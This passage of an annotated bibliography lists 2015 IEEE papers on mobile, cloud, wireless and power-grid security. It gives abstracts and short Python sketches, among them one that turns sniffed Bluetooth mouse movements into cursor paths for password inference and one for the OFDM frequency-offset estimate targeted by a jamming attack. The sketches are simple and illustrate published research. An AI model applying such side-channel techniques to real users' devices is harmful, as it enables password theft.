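        v1 = struct.unpack_from("<Q", memory, addr - base)[0]
        v2 = struct.unpack_from("<Q", memory, addr - base + offset)[0]
        if lo <= v1 < hi and lo <= v2 < hi:
            hits.append(addr)
    return hits

if __name__ == "__main__":
    base = 0x1000
    image = bytearray(0x100)
    struct.pack_into("<Q", image, 0x20, base + 0x40)   # plant a candidate structure:
    struct.pack_into("<Q", image, 0x28, base + 0x80)   # two pointers 8 bytes apart
    print([hex(a) for a in find_pointer_chains(bytes(image), base, offset=8)])  # ['0x1020']
```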

 

B. Krupp; N. Sridhar; W. Zhao, "SPE: Security and Privacy Enhancement Framework for Mobile Devices," in IEEE Transactions on Dependable and Secure Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TDSC.2015.2465965

Abstract: In this paper, we present a security and privacy enhancement (SPE) framework for unmodified mobile operating systems. SPE introduces a new layer between the application and the operating system and does not require a device to be jailbroken or to run a custom operating system. We utilize an existing ontology designed for enforcing security and privacy policies on mobile devices to build a policy that is customizable. Based on this policy, SPE provides enhancements to the native controls that currently exist on the platform for privacy- and security-sensitive components. SPE allows access to these components in a way that lets the framework ensure the application is truthful in its declared intent and that the user's policy is enforced. In our evaluation, we verify the correctness of the framework and measure its computational impact on the device. Additionally, we discovered security and privacy issues in several open-source applications by utilizing the SPE framework. From our findings, if SPE is adopted by mobile operating system producers, it would provide consumers and businesses the additional privacy and security controls they demand and allow users to be more aware of security and privacy issues with the applications on their devices.

Keywords: Mobile handsets; Multimedia communication; Ontologies; Operating systems; Privacy; Security; Sensors; Mobile Privacy; Mobile Security; Sensing (ID#: 16-9505)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7182290&isnumber=4358699

 

X. Pan; Z. Ling; A. Pingley; W. Yu; K. Ren; N. Zhang; X. Fu, "Password Extraction via Reconstructed Wireless Mouse Trajectory," in IEEE Transactions on Dependable and Secure Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TDSC.2015.2413410

Abstract: Logitech made the following statement in 2009: "Since the displacements of a mouse would not give any useful information to a hacker, the mouse reports are not encrypted." In this paper, we prove the exact opposite is true - i.e., it is indeed possible to leak sensitive information such as passwords through the displacements of a Bluetooth mouse. Our results can be easily extended to other wireless mice using different radio links. We begin by presenting multiple ways to sniff unencrypted Bluetooth packets containing raw mouse movement data. We then show that such data may reveal text-based passwords entered by clicking on software keyboards. We propose two attacks, the prediction attack and the replay attack, which can reconstruct the on-screen cursor trajectories from sniffed mouse movement data. Two inference strategies are used to discover passwords from cursor trajectories. We conducted a holistic study over all popular operating systems and analyzed how mouse acceleration algorithms and packet losses may affect the reconstruction results. Our real-world experiments demonstrate the severity of privacy leakage from unencrypted Bluetooth mice. We also discuss countermeasures to prevent privacy leakage from wireless mice. To the best of our knowledge, our work is the first to demonstrate privacy leakage from raw mouse data.

Keywords: Acceleration; Bluetooth; Computers; Mice; Operating systems; Prediction algorithms; Trajectory; Mouse; Password; Privacy; Security; Sniffing; Trajectory (ID#: 16-9506)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7061471&isnumber=4358699
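
Reconstructing a cursor path from sniffed displacement reports is, at its simplest, a cumulative sum of the (dx, dy) deltas scaled by a pointer gain. The NumPy sketch below shows that integration step with invented HID reports; the attacks in the paper additionally model OS-specific acceleration curves and packet loss.

```python
import numpy as np

def reconstruct_trajectory(deltas, start=(0, 0), gain=1.0):
    """Integrate raw (dx, dy) mouse reports into on-screen cursor positions.

    A constant gain stands in for the OS pointer-acceleration curve.
    """
    steps = np.asarray(deltas, dtype=float) * gain
    return np.vstack([start, start + np.cumsum(steps, axis=0)])

if __name__ == "__main__":
    # Hypothetical raw reports captured from an unencrypted Bluetooth mouse.
    reports = [(5, 0), (5, 1), (4, -1), (0, 6), (1, 5)]
    path = reconstruct_trajectory(reports, start=(100, 100))
    print(path.astype(int))   # positions to match against on-screen keyboard keys
```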

 

A. Homescu; T. Jackson; S. Crane; S. Brunthaler; P. Larsen; M. Franz, "Large-scale Automated Software Diversity—Program Evolution Redux," in IEEE Transactions on Dependable and Secure Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TDSC.2015.2433252

Abstract: The software monoculture favors attackers over defenders, since it makes all target environments appear similar. Code-reuse attacks, for example, rely on target hosts running identical software. Attackers use this assumption to their advantage by automating parts of creating an attack. This article presents large-scale automated software diversification as a means to shore up this vulnerability implied by our software monoculture. Besides describing an industrial-strength implementation of automated software diversity, we introduce methods to objectively measure the effectiveness of diversity in general, and its potential to eliminate code-reuse attacks in particular.

Keywords: Browsers; Entropy; Operating systems; Program processors; Programming; Security; Biologically-inspired defenses; artificial software diversity; code reuse attacks; jump-oriented programming; return-oriented programming (ID#: 16-9507)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7122891&isnumber=4358699

 

Y. Li; W. Dai; Z. Ming; M. Qiu, "Privacy Protection for Preventing Data Over-Collection in Smart City," in IEEE Transactions on Computers, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TC.2015.2470247

Abstract: In a smart city, all kinds of users' data are stored in electronic devices to make everything intelligent. The smartphone is the most widely used electronic device and is the pivot of all smart systems. However, current smartphones are not competent to manage users' sensitive data, and they face privacy leakage caused by data over-collection. Data over-collection, meaning that smartphone apps collect more of users' data than their original function requires while remaining within the permission scope, is rapidly becoming one of the most serious potential security hazards in the smart city. In this paper, we study the current state of data over-collection and analyze some of the most frequent data over-collection cases. We present a mobile-cloud framework, which is an active approach to eradicating data over-collection. By putting all users' data into a cloud, the security of users' data can be greatly improved. We have performed extensive experiments, and the experimental results demonstrate the effectiveness of our approach.

Keywords: Data privacy; Mobile communication; Operating systems; Privacy; Security; Smart phones; Cyber Security and Privacy; Data Over-Collection; Smart City; Smartphone (ID#: 16-9508)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7210166&isnumber=4358213

 

G. Anagnostou; B. C. Pal, "Impact of Overexcitation Limiters on the Power System Stability Margin Under Stressed Conditions," in IEEE Transactions on Power Systems, vol. PP, no. 99, pp. 1-11, 2015. doi: 10.1109/TPWRS.2015.2440559

Abstract: This paper investigates the impact of the overexcitation limiters (OELs) on the stability margin of a power system which is operating under stressed conditions. Several OEL modeling approaches are presented and the effect of their action has been examined in model power systems. It is realized that, more often than not, OEL operating status goes undetected by existing dynamic security assessment tools commonly used in the industry. It is found that the identification and accurate representation of OELs lead to significantly different transient stability margins. Unscented Kalman filtering is used to detect the OEL activation events. In the context of stressed system operation, such quantitative assessment is very useful for system control. This understanding is further reinforced through detailed studies in two model power systems.

Keywords: Generators; Mathematical model; Power system stability; Stability criteria; Transient analysis; Kalman filters; power system dynamics; power system security; stability criteria (ID#: 16-9509)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7128744&isnumber=4374138

 

H. Rahbari; M. Krunz; L. Lazos, "Swift Jamming Attack on Frequency Offset Estimation: The Achilles Heel of OFDM Systems," in IEEE Transactions on Mobile Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TMC.2015.2456916

Abstract: Frequency offset (FO) refers to the difference in the operating frequencies of two radio oscillators. Failure to compensate for the FO may lead to decoding errors, particularly in OFDM systems. To correct the FO, wireless standards append a publicly known preamble to every frame before transmission. In this paper, we demonstrate how an adversary can exploit the known preamble structure of OFDM-based wireless systems, particularly IEEE 802.11a/g/n/ac, to launch a very stealthy (low-energy, low-duty-cycle) reactive jamming attack against the FO estimation mechanism. In this attack, the adversary quickly detects a transmitted OFDM frame and subsequently jams a tiny part of the preamble that is used for FO estimation at the legitimate receiver. By optimizing the energy and structure of the jamming signal and accounting for frame detection timing errors and unknown channel parameters, we empirically show that the adversary can induce a bit error rate close to 0.5, making the transmission practically irrecoverable. Such vulnerability to FO jamming exists even when the frame is shielded by efficient channel coding. We evaluate the FO estimation attack through simulations and USRP experimentation. We also propose three approaches to mitigate such an attack.

Keywords: Channel estimation; Estimation; IEEE 802.11 Standard; Jamming; OFDM; Timing; Wireless communication; IEEE 802.11; OFDM; PHY-layer security; USRP implementation; frequency offset; reactive jamming (ID#: 16-9510)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163332&isnumber=4358975
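
The targeted FO estimator exploits a preamble built from repeated halves: a carrier offset shows up as a fixed phase rotation between the two halves, so correlating them recovers it (the classic Schmidl-Cox idea). The NumPy sketch below simulates this with a hypothetical preamble and a 30 kHz offset; jamming exactly these few preamble samples is what the paper shows breaks the estimate.

```python
import numpy as np

def estimate_cfo(rx, half_len, sample_rate):
    """Estimate carrier frequency offset from a preamble with two identical halves."""
    corr = np.sum(np.conj(rx[:half_len]) * rx[half_len:2 * half_len])
    return np.angle(corr) * sample_rate / (2 * np.pi * half_len)

if __name__ == "__main__":
    fs, cfo, L = 20e6, 30e3, 16                    # 20 MHz sampling, 30 kHz offset
    rng = np.random.default_rng(0)
    half = np.exp(2j * np.pi * rng.random(L))      # hypothetical known preamble half
    tx = np.tile(half, 2)
    n = np.arange(2 * L)
    rx = tx * np.exp(2j * np.pi * cfo * n / fs)    # the offset rotates each sample
    print(round(estimate_cfo(rx, L, fs), 1))       # ~30000.0 Hz
```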

 

J. Ma; G. Geng; Q. Jiang, "Two-Time-Scale Coordinated Energy Management for Medium-Voltage DC Systems," in IEEE Transactions on Power Systems, vol. PP, no. 99, pp. 1-13, 2015. doi: 10.1109/TPWRS.2015.2504517

Abstract: In medium-voltage DC (MVDC) systems, to manage the impacts of the uncertainty and variability brought by highly penetrated renewable energy sources (RES), this paper proposes a two-time-scale coordinated energy management method. Based on a hierarchical control framework, droop control is used and its two key factors, the operating point and the droop coefficient, are co-optimized. To improve operational benefits, operating points are determined in the reference optimization, considering the long-term cooperative operation of the various integrated units. To enhance system security, droop coefficients are optimized in the coefficient optimization, where controllers' responses to the system's unbalanced power and to changes of the system voltage profile within the dispatch interval are both considered. Since these two optimizations are performed on different time scales, a two-time-scale coordinated strategy is designed to balance long-term economic benefits and short-term security performance. The proposed approach is verified on a typical MVDC system with a meshed network topology. Conventional and renewable energy sources as well as schedulable and unschedulable load demands are considered. Numerical experiments indicate that the proposed approach is capable of providing economical and reliable dispatch, adapting to the forecast errors and fluctuations brought by the highly penetrated RESs and other unschedulable units.

Keywords: Economics; Energy management; Medium voltage; Optimization; Security; Uncertainty; Voltage control; Coefficient optimization; MVDC system; droop control; energy management; two-time-scale coordinated strategy (ID#: 16-9511)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7353227&isnumber=4374138

 

J. Yost, "The March of IDES: A History of the Intrusion Detection Expert System," in IEEE Annals of the History of Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/MAHC.2015.41

Abstract: This paper examines the pre-history and history of early intrusion detection expert systems by focusing on the first such system, the Intrusion Detection Expert System, or IDES, which was developed in the second half of the 1980s at SRI International (and SRI's follow-on Next-Generation Intrusion Detection Expert System, or NIDES, in the early-to-mid 1990s). It also presents and briefly analyzes the outsized contribution of women scientists to leadership in this area of computer security research and development, contrasting it with the largely male-led work on "high-assurance" operating system design, development, and standard-setting.

Keywords: Communities; Computer security; Computers; Expert systems; History; Intrusion detection (ID#: 16-9512)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7155454&isnumber=5255174

 

P. Henneaux; P. E. Labeau; J. C. Maun; L. Haarla, "A Two-Level Probabilistic Risk Assessment of Cascading Outages," in IEEE Transactions on Power Systems, vol. PP, no. 99, pp. 1-11, 2015. doi: 10.1109/TPWRS.2015.2439214

Abstract: Cascading outages in power systems can lead to major power disruptions and blackouts and involve a large number of different mechanisms. The typical development of a cascading outage can be split in two phases with different dominant cascading mechanisms. As a power system is usually operated in N-1 security, an initiating contingency cannot entail a fast collapse of the grid. However, it can trigger a thermal transient, increasing significantly the likelihood of additional contingencies, in a “slow cascade.” The loss of additional elements can then trigger an electrical instability. This is the origin of the subsequent “fast cascade,” where a rapid succession of events can lead to a major power disruption. Several models of probabilistic simulations exist, but they tend to focus either on the slow cascade or on the fast cascade, according to mechanisms considered, and rarely on both. We propose in this paper a decomposition of the analysis in two levels, able to combine probabilistic simulations for the slow and the fast cascades. These two levels correspond to these two typical phases of a cascading outage. Models are developed for each of these phases. A simplification of the overall methodology is applied to two test systems to illustrate the concept.

Keywords: Computational modeling; Load modeling; Power system dynamics; Power system stability; Probabilistic logic; Steady-state; Transient analysis; Blackout; Monte Carlo methods; cascading failure; power system reliability; power system security; risk analysis (ID#: 16-9513)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7127060&isnumber=4374138

 

Y. Jia; Z. Xu; L. L. Lai; K. P. Wong, "Risk based Power System Security Analysis Considering Cascading Outages," in IEEE Transactions on Industrial Informatics, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TII.2015.2499718

Abstract: Successful development of the smart grid demands strengthened system security and reliability, which requires effective security analysis when conducting system operation and expansion planning. The classical N-1 criterion has been widely used in the past to examine every credible contingency through detailed computations. The adequacy of such an approach becomes doubtful in many recent blackouts where cascading outages were involved. This may be attributed to the increased complexities and nonlinearities of operating conditions and network structures in the context of smart grid development. To address security threats, particularly those from cascading outages, a new and efficient security analysis approach is proposed, which comprises a cascading failure simulation module (CFSM) for post-contingency analysis and a risk evaluation module (REM) based on a decorrelated neural network ensemble (DNNE) algorithm. This approach overcomes the drawback of the high computational cost of classical N-k induced cascading contingency analysis. Case studies on two different IEEE test systems and a practical transmission system, the Polish 2383-bus system, have been conducted to demonstrate the effectiveness of the proposed approach for risk evaluation of cascading contingencies.

Keywords: Computational modeling; Load flow; Load modeling; Monte Carlo methods; Power system faults; Power system protection; Security; N-k contingency; cascading failures; data mining; security analysis; smart grids (ID#: 16-9514)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7327191&isnumber=4389054

 

K. E. Van Horn; A. D. Dominguez-Garcia; P. W. Sauer, "Measurement-Based Real-Time Security-Constrained Economic Dispatch," in IEEE Transactions on Power Systems, vol. PP, no. 99, pp. 1-13, 2015. doi: 10.1109/TPWRS.2015.2493889

Abstract: In this paper, we propose a measurement-based approach to the real-time security-constrained economic dispatch (SCED). The real-time SCED is a widely used market scheduling tool that seeks to economically balance electricity supply and demand and provide locational marginal prices (LMPs), while ensuring system reliability standards are met. To capture network flows and security considerations, the conventional SCED formulation relies on sensitivities that are typically computed from a linearized power flow model, which is vulnerable to phenomena such as undetected topology changes, changes in the system operating point, and the existence of incorrect model data. Our approach to the formulation of the SCED problem utilizes power system sensitivities estimated from phasor measurement unit (PMU) measurements. The resulting measurement-based real-time SCED is robust against the aforementioned phenomena. Moreover, the dispatch instructions and LMPs calculated with the proposed measurement-based SCED accurately reflect real-time system conditions and security needs. We illustrate the strengths of the proposed approach via several case studies.

Keywords: Analytical models; Computational modeling; Economics; Phasor measurement units; Real-time systems; Security; Sensitivity; Contingency analysis; PMU; distribution factors; economic dispatch; estimation; operations; security (ID#: 16-9515)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7348719&isnumber=4374138
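
The measurement-based ingredient of this work can be illustrated with a least-squares fit of flow sensitivities to PMU-style snapshots. This is only a minimal sketch of the general idea, assuming synthetic data and NumPy; the paper's estimator and SCED formulation are more involved.

# Hedged sketch: estimating line-flow sensitivities (injection shift
# factors) from PMU snapshots by ordinary least squares.
import numpy as np

rng = np.random.default_rng(0)
T, n_inj = 200, 3                          # snapshots, injection buses
S_true = np.array([[0.4, -0.2, 0.1]])      # unknown "true" sensitivity row
dP = rng.normal(size=(T, n_inj))           # observed injection deviations
df = dP @ S_true.T + 0.01 * rng.normal(size=(T, 1))  # noisy flow deviations

S_hat, *_ = np.linalg.lstsq(dP, df, rcond=None)      # fit sensitivities
print("Estimated sensitivities:", S_hat.ravel())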

 

Y. Huang; X. Yuan; J. Hu; P. Zhou; D. Wang, "DC-Bus Voltage Control Stability Affected by AC-Bus Voltage Control in VSCs Connected to Weak AC Grids," in IEEE Journal of Emerging and Selected Topics in Power Electronics, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/JESTPE.2015.2480859

Abstract: With the widespread application of voltage source converters (VSCs) in power systems, DC-bus voltage control instabilities increasingly occur in practice, especially in weak AC grids, posing challenges to the stability and security of power converter applications. This paper gives physical insight into how AC-bus voltage control affects the stability of DC-bus voltage control in VSCs connected to weak grids. The concepts of damping and restoring components are developed for the DC-bus voltage to describe the stability of its control, so the impact of AC-bus voltage control on DC-bus voltage control stability can be revealed by investigating its impact on these damping and restoring components. A detailed analysis of this impact is presented for varied AC system strengths, operating points, and AC-bus voltage control parameters. Simulation results from a 1.5-MW full-capacity wind power generation system conform well to the analysis, and experimental results validate it.

Keywords: Damping; Phase locked loops; Power conversion; Power system stability; Stability analysis; Voltage control; AC-bus voltage control; DC-bus voltage control; small-signal stability; voltage source converter; weak grid (ID#: 16-9516)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273745&isnumber=6507303

 

Y. Zhang; D. Li; Z. Sun; F. Zhao; J. Su; X. Lu, "CSR: Classified Source Routing in DHT-Based Networks," in IEEE Transactions on Cloud Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TCC.2015.2440242

Abstract: In recent years, cloud computing has provided a new way to address the constraints of limited energy, capabilities, and resources. Distributed hash table (DHT) based networks have become increasingly important for efficient communication in large-scale cloud systems. Previous studies mainly focus on improving performance metrics such as latency, scalability and robustness, but seldom consider security demands on the routing paths, for example, bypassing untrusted intermediate nodes. Inspired by Internet source routing, in which source nodes specify the routing paths taken by their packets, this paper presents CSR, a tag-based Classified Source Routing scheme for DHT-based cloud networks that satisfies security demands on the routing paths. Unlike Internet source routing, which requires some map of the overall network, CSR operates in a distributed manner: nodes with a certain security level are tagged with a label, and routing messages requiring that level of security are forwarded only to qualified next-hops. We show how this can be achieved efficiently, by simple extensions of traditional routing structures, and safely, so that the routing is uniformly convergent. The effectiveness of our proposals is demonstrated through theoretical analysis and extensive simulations.

Keywords: Cloud computing; Robustness; Routing; Security; Servers; Topology; CSR (classified source routing); DLG-de Bruijn (DdB); distributed hash table (DHT); path diversity; tag (ID#: 16-9517)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116526&isnumber=6562694
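
A minimal sketch of the tag-filtering idea, assuming a numeric DHT identifier space and invented tag levels; the actual CSR scheme extends real DHT routing tables and guarantees convergence.

# Hedged sketch: forward a message only to next-hops whose security tag
# meets the message's required level, then pick the greedy DHT choice.
def next_hop(neighbors, key, required_level):
    """neighbors: list of (node_id, tag_level); return the qualified
    neighbor whose id is numerically closest to the DHT key."""
    qualified = [(nid, lvl) for nid, lvl in neighbors if lvl >= required_level]
    if not qualified:
        return None   # no sufficiently trusted path via this node
    return min(qualified, key=lambda n: abs(n[0] - key))[0]

print(next_hop([(12, 0), (40, 2), (55, 1)], key=50, required_level=1))  # -> 55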

 

L. Xu; J. Lee; S. H. Kim; Q. Zheng; S. Xu; T. Suh; W. W. Ro; W. Shi, "Architectural Protection of Application Privacy Against Software and Physical Attacks in Untrusted Cloud Environment," in IEEE Transactions on Cloud Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TCC.2015.2511728

Abstract: In cloud computing, it is often assumed that cloud vendors are trusted and that the guest Operating System (OS) and the Virtual Machine Monitor (VMM, also called the hypervisor) are secure. However, these assumptions do not always hold in practice, and existing approaches cannot protect the data privacy of applications when none of these parties is trusted. We investigate how to cope with a strong threat model in which the cloud vendor, the guest OS, the VMM, or any combination of them may be malicious or untrusted and can launch attacks against the privacy of trusted user applications. This model is relevant because applications may be small enough to be formally verified, while the guest OS and VMM are too complex for formal verification. Specifically, we present the design and analysis of an architectural solution that integrates a set of on-chip components to protect the memory of trusted applications from potential software- and hardware-based attacks by untrusted cloud providers, a compromised guest OS, or a malicious VMM. Full-system performance evaluation shows that the design incurs only 9% overhead on average, a small performance price for the substantial security gain.

Keywords: Cloud computing; Context; Hardware; Kernel; Privacy; Security; Virtual machine monitors; Architectural Support; Security; Virtualization (ID#: 16-9518)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7364212&isnumber=6562694

 

W. Zeng; Y. Zhang; M. Y. Chow, "Resilient Distributed Energy Management Subject to Unexpected Misbehaving Generation Units," in IEEE Transactions on Industrial Informatics, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TII.2015.2496228

Abstract: Distributed energy management algorithms are being developed for the smart grid to efficiently and economically allocate electric power among connected distributed generation units and loads. Such algorithms provide flexibility, robustness, and scalability, but they also increase the smart grid's vulnerability to unexpected faults and adversaries, and the potential consequences of compromising the power system can be devastating to public safety and the economy. It is therefore important to maintain acceptable performance of distributed energy management algorithms under malicious cyberattacks. In this paper, a neighborhood-watch based distributed energy management algorithm is proposed to guarantee accurate control computation in solving the economic dispatch problem in the presence of compromised generation units. The proposed method achieves system resilience by performing reliable distributed control without a central coordinator and allowing all well-behaving generation units to reach the optimal operating point asymptotically. The effectiveness of the proposed method is demonstrated through case studies under several different adversary scenarios.

Keywords: Algorithm design and analysis; Energy management; Integrated circuits; Resilience; Security; Smart grids; Economic dispatch; neighborhood-watch; resilient distributed energy management (ID#: 16-9519)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7312956&isnumber=4389054

 

T. Pasquier; J. Singh; D. Eyers; J. Bacon, "CamFlow: Managed Data-sharing for Cloud Services," in IEEE Transactions on Cloud Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TCC.2015.2489211

Abstract: A model of cloud services is emerging whereby a few trusted providers manage the underlying hardware and communications whereas many companies build on this infrastructure to offer higher level, cloud-hosted PaaS services and/or SaaS applications. From the start, strong isolation between cloud tenants was seen to be of paramount importance, provided first by virtual machines (VM) and later by containers, which share the operating system (OS) kernel. Increasingly it is the case that applications also require facilities to effect isolation and protection of data managed by those applications. They also require flexible data sharing with other applications, often across the traditional cloud-isolation boundaries; for example, when government provides many related services for its citizens on a common platform. Similar considerations apply to the end-users of applications. But in particular, the incorporation of cloud services within ‘Internet of Things’ architectures is driving the requirements for both protection and cross-application data sharing. These concerns relate to the management of data. Traditional access control is application and principal/role specific, applied at policy enforcement points, after which there is no subsequent control over where data flows; a crucial issue once data has left its owner’s control by cloud-hosted applications and within cloud services. Information Flow Control (IFC), in addition, offers system-wide, end-to-end, flow control based on the properties of the data. We discuss the potential of cloud-deployed IFC for enforcing owners’ dataflow policy with regard to protection and sharing, as well as safeguarding against malicious or buggy software. In addition, the audit log associated with IFC provides transparency, giving configurable system-wide visibility over data flows. This helps those responsible to meet their data management obligations, providing evidence of compliance, and aids in the identification of policy errors and misconfigurations. We present our IFC model and describe and evaluate our IFC architecture and implementation (CamFlow). This comprises an OS level implementation of IFC with support for application management, together with an IFC-enabled middleware. Our contribution is to demonstrate the feasibility of incorporating IFC into cloud services: we show how the incorporation of IFC into cloud-provided OSs underlying PaaS and SaaS would address application sharing and protection requirements, and more generally, greatly enhance the trustworthiness of cloud services at all levels, at little overhead, and transparently to tenants.

Keywords: Access control; Cloud computing; Computational modeling; Computer architecture; Containers; Context; Audit; Cloud; Compliance; Data Management; Information Flow Control; Linux Security Module; Middleware; PaaS; Provenance; Security (ID#: 16-9520)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7295590&isnumber=6562694
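
The flow rule at the heart of tag-based IFC systems of this kind can be stated in a few lines. The sketch below illustrates the classic secrecy/integrity check with invented entities and tags; it is not CamFlow's actual kernel implementation.

# Hedged illustration of an Information Flow Control check: data may flow
# from a to b only if b holds all of a's secrecy tags and a holds all of
# b's integrity tags.
def can_flow(src, dst):
    return (src["secrecy"] <= dst["secrecy"]
            and dst["integrity"] <= src["integrity"])

app = {"secrecy": {"medical"}, "integrity": {"vetted"}}
log = {"secrecy": {"medical", "audit"}, "integrity": set()}
web = {"secrecy": set(), "integrity": set()}

print(can_flow(app, log))  # True: the log is at least as secret
print(can_flow(app, web))  # False: would leak the 'medical' tag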

 

L. Wu; X. Du; J. Wu, "Effective Defense Schemes for Phishing Attacks on Mobile Computing Platforms," in IEEE Transactions on Vehicular Technology, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TVT.2015.2472993

Abstract: Recent years have witnessed the increasing threat of phishing attacks on mobile computing platforms. In fact, mobile phishing is particularly dangerous due to the hardware limitations of mobile devices and to mobile user habits. In this paper, we conduct a comprehensive study of the security vulnerabilities caused by mobile phishing attacks, including web page phishing, application phishing, and account registry phishing. Existing schemes designed for web phishing attacks on PCs cannot effectively address the various phishing attacks on mobile devices. Hence, we propose MobiFish, a novel automated lightweight anti-phishing scheme for mobile platforms. MobiFish verifies the validity of web pages, applications, and persistent accounts by comparing the actual identity to the claimed identity. MobiFish has been implemented on a Nexus 4 smartphone running the Android 4.2 operating system. We experimentally evaluate the performance of MobiFish with 100 phishing URLs and corresponding legitimate URLs, as well as phishing apps. The results show that MobiFish is very effective in detecting phishing attacks on mobile phones.

Keywords: Browsers; HTML; Mobile communication; Mobile handsets; Twitter; Uniform resource locators; Web pages; Mobile computing; phishing attacks; security and protection (ID#: 16-9521)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7222471&isnumber=4356907
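
The claimed-versus-actual identity comparison described above can be sketched as follows; the helper and sample URLs are hypothetical, and MobiFish itself extracts the claimed identity from the rendered page (e.g., by OCR) rather than taking it as an argument.

# Hedged sketch: flag a page when no claimed brand name appears in the
# second-level label of the domain actually contacted.
from urllib.parse import urlparse

def looks_like_phish(url, claimed_brands):
    host = urlparse(url).hostname or ""
    sld = host.split(".")[-2] if "." in host else host  # naive 2nd-level label
    return not any(brand.lower() in sld.lower() for brand in claimed_brands)

print(looks_like_phish("https://paypa1-secure.example.com/login", ["PayPal"]))  # True
print(looks_like_phish("https://www.paypal.com/signin", ["PayPal"]))            # False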

 

T. Wu; K. Ganesan; A. Hu; H. S. P. Wong; S. Wong; S. Mitra, "TPAD: Hardware Trojan Prevention and Detection for Trusted Integrated Circuits," in IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TCAD.2015.2474373

Abstract: There are increasing concerns about possible malicious modifications of integrated circuits (ICs) used in critical applications. Such attacks are often referred to as hardware Trojans. While many techniques focus on hardware Trojan detection during IC testing, it is still possible for attacks to go undetected. Using a combination of new design techniques and new memory technologies, we present a new approach that detects a wide variety of hardware Trojans during IC testing and also during system operation in the field. Our approach can also prevent a wide variety of attacks during synthesis, place-and-route, and fabrication of ICs. It can be applied to any digital system, can be tuned for both traditional and split-manufacturing methods, and we demonstrate its applicability for both ASICs and FPGAs. Using fabricated test chips with Trojan emulation capabilities and also using simulations, we demonstrate that: 1. the area and power costs of our approach range from 7.4% to 165% and from 7% to 60%, respectively, depending on the design and the attacks targeted; 2. the speed impact can be minimal (close to 0%); 3. our approach can detect 99.998% of Trojans (emulated using test chips) that do not require detailed knowledge of the design being attacked; 4. our approach can prevent 99.98% of specific attacks (simulated) that utilize detailed knowledge of the design being attacked (e.g., through reverse-engineering); 5. our approach never produces false positives, i.e., it does not report attacks when the IC operates correctly.

Keywords: Encoding; Hardware; Integrated circuits; Monitoring; Random access memory; Trojan horses; Wires; 3D Integration; Concurrent Error Detection; Hardware Security; Hardware Trojan; Randomized Codes; Reliable Computing; Resistive RAM; Split-manufacturing (ID#: 16-9522)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7229283&isnumber=6917053
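
One ingredient the abstract names, randomized codes for concurrent error detection, can be illustrated with a toy parity-code check. This Python sketch is only a software analogy for what TPAD does in hardware; the masks and word width are invented.

# Hedged sketch: parity check bits over secret random bit subsets. The last
# mask is whole-word parity, so any single-bit flip is always caught; the
# random masks catch wider tampering with high probability.
import random

random.seed(1)
WIDTH = 16
masks = [random.getrandbits(WIDTH) for _ in range(3)] + [(1 << WIDTH) - 1]

def checkbits(word):
    return tuple(bin(word & m).count("1") % 2 for m in masks)

word = 0xBEEF
stored = checkbits(word)
tampered = word ^ 0x0100            # a Trojan flips one bit
print(checkbits(tampered) == stored)  # False: the flip is detected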

 

K. Huguenin; E. Le Merrer; N. Le Scouarnec; G. Straub, "Efficient and Transparent Wi-Fi Offloading for HTTP(S) POSTs," in IEEE Transactions on Mobile Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TMC.2015.2442237

Abstract: With the emergence of online platforms for (social) sharing, collaboration and backing up, mobile users generate ever-increasing amounts of digital data, such as documents, photos and videos, which they upload while on the go. Cellular Internet connectivity (e.g., 3G/4G) enables mobile users to upload their data but drains the battery of their devices and overloads mobile service providers. Wi-Fi data offloading overcomes the aforementioned issues for delay-tolerant data. However, it comes at the cost of constrained mobility for users, as they are required to stay within a given area while the data is uploaded. The up-link of the broadband connection of the access point often constitutes a bottleneck and incurs waiting times of up to tens of minutes. In this paper, we advocate the exploitation of the storage capabilities of common devices located on the Wi-Fi access point’s LAN, typically residential gateways, NAS units or set-top boxes, to decrease the waiting time. We propose HOOP, a system for offloading upload tasks onto such devices. HOOP operates seamlessly on HTTP(S) POST, which makes it highly generic and widely applicable; it also requires limited changes on the gateways and on the web servers and none to existing protocols or browsers. HOOP is secure and, in a typical setting, reduces the waiting time by up to a factor of 46. We analyze the security of HOOP and evaluate its performance by correlating mobility traces of users with the position of the Wi-Fi access points of a leading community network (i.e., FON) that relies on major national ISPs. We show that, in practice, HOOP drastically decreases the delay between the time the photo is taken and the time it is uploaded, compared to regular Wi-Fi data offloading. We also demonstrate the practicality of HOOP by implementing it on a wireless router.

